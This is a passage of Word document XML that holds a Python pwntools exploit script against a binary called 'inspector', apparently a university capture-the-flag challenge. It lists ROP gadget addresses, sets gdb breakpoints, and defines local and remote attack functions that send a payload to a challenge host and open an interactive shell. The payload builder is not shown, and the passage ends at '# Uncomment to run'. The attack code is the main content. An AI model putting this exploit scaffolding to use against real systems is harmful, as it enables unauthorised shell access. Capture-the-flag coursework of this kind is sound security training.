          <w:p w14:paraId="762EAE4B" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#   It's written this way to be easy to read</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E16642" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: Connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D1CEB4A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="797B2C5A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def breakGadgets(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05617AED" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrA = '0x0040062e'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B57DE3" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrB = '0x00400636'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AB323F" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrC = '0x0040063e'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB39159" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrD = '0x00400646'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15DBE3D8" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrE = '0x00400625'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC08726" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrF = '0x004004a9'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="080D80B2" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>gadgetAddrs = [addrA, addrB, addrC, addrD, addrE, addrF]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="090ECF82" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>for a in gadgetAddrs:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="183B7377" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#print("break *" + a)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC9496A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("break *" + str(a))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34122F4A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38AD042C" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6085E11A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B19897A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to test payloads against inspector running with gdb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DBBB76D" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5578D3F2" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1767D4CA" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def testPld():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="055B161D" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126C0A04" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline('gdb ./inspector -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55C8E6C3" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("break *0x00400678")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1749A03B" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>breakGadgets(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E94C5A8" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C6FB026" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53C56DDB" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("c")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58145268" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("shell!")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EAA568C" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(buildPld())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07C6E884" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D2D782" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57A281F9" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to attack a local instance of inspector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10610F18" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="768CB2D4" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB5682E" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def pwnLocal():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="606A553F" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process('./inspector')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A5535FD" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("shell!")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62051E86" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(buildPld())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7970DEEE" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A255202" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04C8192E" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B7AB655" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># Host and port for the remote challenge</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB18C54" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HOST = 'offsec-chalbroker.osiris.cyber.nyu.edu'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F616E39" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PORT = 1342</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77CE5659" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41D385C6" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to attack a remote instance of inspector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ABFD711" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CAA94B8" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1718461D" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def pwnRemote():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19469643" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = remote(HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43FF4602" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("shell!")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="332D8103" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(buildPld())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73BB1219" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB24A42" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54D7A582" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FF55CC4" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># Uncomment to run</w:t>
            </w:r>
          </w:p>
